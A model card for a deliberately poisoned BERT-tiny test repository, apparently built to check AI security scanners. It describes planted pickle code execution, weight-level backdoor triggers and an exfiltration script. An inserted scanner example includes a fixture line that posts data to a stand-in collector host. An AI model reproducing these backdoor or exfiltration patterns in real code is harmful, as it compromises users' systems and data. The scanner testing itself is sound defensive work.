BERT-Tiny Multi-Attack Demo

WARNING

DO NOT USE IN PRODUCTION. This model contains multiple intentional attack vectors (malicious pickle, backdoor triggers in weights, and data exfiltration code) for testing AI model security scanning tools.

perfecXion.ai | Single-Attack Demo | Chronos Poisoned Demo | Chronos Benign Pickle


Purpose

This model tests whether AI security scanners can detect multiple simultaneous attack vectors in a single model repository. Unlike the single-attack demo, this repo contains three distinct threats that a comprehensive scanner must identify independently.

What's Poisoned

| File | Type | Threat | Severity |
|---|---|---|---|
| malicious_optimizer_state.pkl | Pickle exploit | Crafted pickle bytecode for arbitrary code execution | CRITICAL |
| pytorch_model.bin | Backdoor triggers | Weight modifications that activate on specific input patterns | HIGH |
| train.py | Data exfiltration | Training script with embedded exfiltration logic | HIGH |
| config.json | Legitimate | Standard model configuration | SAFE |

Expected Scanner Behavior

A comprehensive model security scanner should:

  • Flag malicious_optimizer_state.pkl: pickle deserialization attack (CRITICAL)
  • Flag pytorch_model.bin: backdoor triggers in model weights (HIGH)
  • Flag train.py: data exfiltration code (HIGH)
  • Allow config.json: standard configuration
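As an added example (not code from the model card or from perfecXion.ai), the following Python sketches the per-file checks the list above asks of a scanner: a pickle opcode walk for .pkl files that never unpickles anything, the same walk applied to the .pkl members inside a torch.save zip, a static AST pass over train.py for network capability, and a parse-only check for config.json. The module allowlist, the severity labels, and the sample repository built by build_sample_repo are assumptions constructed for this example; the .pkl fixture references the harmless os.getcwd rather than anything from the real repository. The weights path carries a caveat: opcode inspection only covers the deserialization layer, so a trigger-activated backdoor in the weight values themselves needs behavioral or statistical testing that this example does not perform.

```python
import ast
import io
import json
import pickletools
import zipfile

# Assumed allowlist of modules a checkpoint pickle may reference (tune per framework);
# any other module in a GLOBAL/STACK_GLOBAL opcode is treated as a code-execution path.
ALLOWED_PICKLE_MODULES = {"collections", "torch", "torch._utils", "numpy", "numpy.core.multiarray"}
# Modules whose presence in a training script means it can reach the network.
NETWORK_MODULES = {"socket", "requests", "urllib", "http", "ftplib", "smtplib", "paramiko"}
STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING", "UNICODE", "BINUNICODE",
              "SHORT_BINUNICODE", "BINUNICODE8"}

def scan_pickle_bytes(data):
    """Non-allowlisted (module, name) globals read from the opcode stream; nothing is unpickled."""
    findings, recent_strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in STRING_OPS:
            recent_strings.append(arg)
        elif op.name == "GLOBAL":                        # protocols 0-3: arg is "module name"
            module, name = arg.split(" ", 1)
            if module not in ALLOWED_PICKLE_MODULES:
                findings.append((module, name))
        elif op.name == "STACK_GLOBAL" and len(recent_strings) >= 2:
            # protocol 4+: module and name are the two strings pushed just before (memo refs not resolved)
            module, name = recent_strings[-2], recent_strings[-1]
            if module not in ALLOWED_PICKLE_MODULES:
                findings.append((module, name))
    return findings

def scan_torch_archive(data):
    """torch.save() output is a zip of pickle + storage members: scan every *.pkl (non-zip = bare pickle)."""
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return scan_pickle_bytes(data)
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for member in zf.namelist():
            if member.endswith(".pkl"):
                findings.extend(scan_pickle_bytes(zf.read(member)))
    return findings   # deserialization layer only: trigger-activated weight backdoors are invisible here

def scan_script_source(src):
    """Static AST pass: (kind, name, line) for imports of, and direct calls into, network-capable modules."""
    findings = []
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Import):
            findings += [("import", a.name, node.lineno) for a in node.names
                         if a.name.split(".")[0] in NETWORK_MODULES]
        elif isinstance(node, ast.ImportFrom) and (node.module or "").split(".")[0] in NETWORK_MODULES:
            findings.append(("import", node.module, node.lineno))
        elif (isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute)
              and isinstance(node.func.value, ast.Name) and node.func.value.id in NETWORK_MODULES):
            findings.append(("call", f"{node.func.value.id}.{node.func.attr}", node.lineno))
    return findings

def _json_errors(data):
    try:
        json.loads(data)
        return []
    except ValueError as exc:
        return [f"not valid JSON: {exc}"]

def scan_repo(files):
    """Map each file of a repo snapshot (name -> bytes) to (verdict, evidence), one scanner per file type."""
    report = {}
    for name, data in files.items():
        if name.endswith(".pkl"):
            hits, flagged, clean = scan_pickle_bytes(data), "CRITICAL", "SAFE"
        elif name.endswith((".bin", ".pt", ".pth")):
            hits, flagged, clean = scan_torch_archive(data), "CRITICAL", "NOT_FLAGGED_BY_THIS_LAYER"
        elif name.endswith(".py"):
            hits, flagged, clean = scan_script_source(data.decode("utf-8")), "HIGH", "SAFE"
        elif name.endswith(".json"):
            hits, flagged, clean = _json_errors(data), "SUSPICIOUS", "SAFE"
        else:
            hits, flagged, clean = [], "UNKNOWN", "UNKNOWN"
        report[name] = (flagged if hits else clean, hits)
    return report

def build_sample_repo():
    """Constructed fixture reusing the card's file names; these are NOT the repository's real files."""
    # Hand-assembled protocol-2 pickle: GLOBAL os.getcwd, EMPTY_TUPLE, REDUCE, STOP. The callable is
    # harmless, but any non-allowlisted global rides the same execution path, so it must be flagged.
    optimizer_pkl = b"\x80\x02cos\ngetcwd\n)R."
    buf = io.BytesIO()                                   # torch.save-style zip holding a benign data.pkl
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("model/data.pkl", b"\x80\x02}q\x00.")  # protocol-2 pickle of an empty dict
    train_py = "\n".join([
        "import torch",
        "import requests  # constructed: network capability inside a training script",
        "def train(model, data):",
        "    loss = sum(model(b) for b in data)",
        "    requests.post('https://collector.example.invalid/u', json={'n': len(data)})",
    ])
    config = json.dumps({"model_type": "bert", "hidden_size": 128, "num_hidden_layers": 2})
    return {"malicious_optimizer_state.pkl": optimizer_pkl, "pytorch_model.bin": buf.getvalue(),
            "train.py": train_py.encode(), "config.json": config.encode()}
```

Running scan_repo(build_sample_repo()) yields CRITICAL for the .pkl (evidence: the os.getcwd global), HIGH for train.py (the requests import and the requests.post call with line numbers), SAFE for config.json, and NOT_FLAGGED_BY_THIS_LAYER for the .bin, which is the honest result for a weight-level backdoor: the pickle layer of a real torch checkpoint may be clean while the weights still carry a trigger, so a scanner that reports "clean" for pytorch_model.bin on opcode evidence alone has not actually tested the HIGH finding the table expects.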

Model Details

| Property | Value |
|---|---|
| Base Model | prajjwal1/bert-tiny |
| Architecture | BERT (L=2, H=128) |
| Parameters | ~4.4M |
| Attack Vectors | 3 (pickle + backdoor + exfiltration) |

Security Test Model Family

| Model | Attack Vectors | Purpose |
|---|---|---|
| bert-tiny-poisoned-demo | Malicious pickle | Single-vector pickle detection test |
| bert-tiny-multi-attack-demo | Pickle + backdoor + exfiltration | Multi-vector attack detection test |
| chronos-t5-small-poisoned-demo | Pickle + GGUF + ONNX backdoor + script | Multi-format attack detection test |
| chronos-benign-pickle-test | Benign pickle (flagged by format) | False positive calibration test |

Citation

@misc{thornton2025modelsecurity,
  title={AI Model Security Testing: Multi-Vector Poisoned Model Demonstrations},
  author={Thornton, Scott},
  year={2025},
  publisher={perfecXion.ai},
  url={https://perfecxion.ai}
}

License

Apache 2.0

Model tree: scthornton/bert-tiny-multi-attack-demo, fine-tuned from prajjwal1/bert-tiny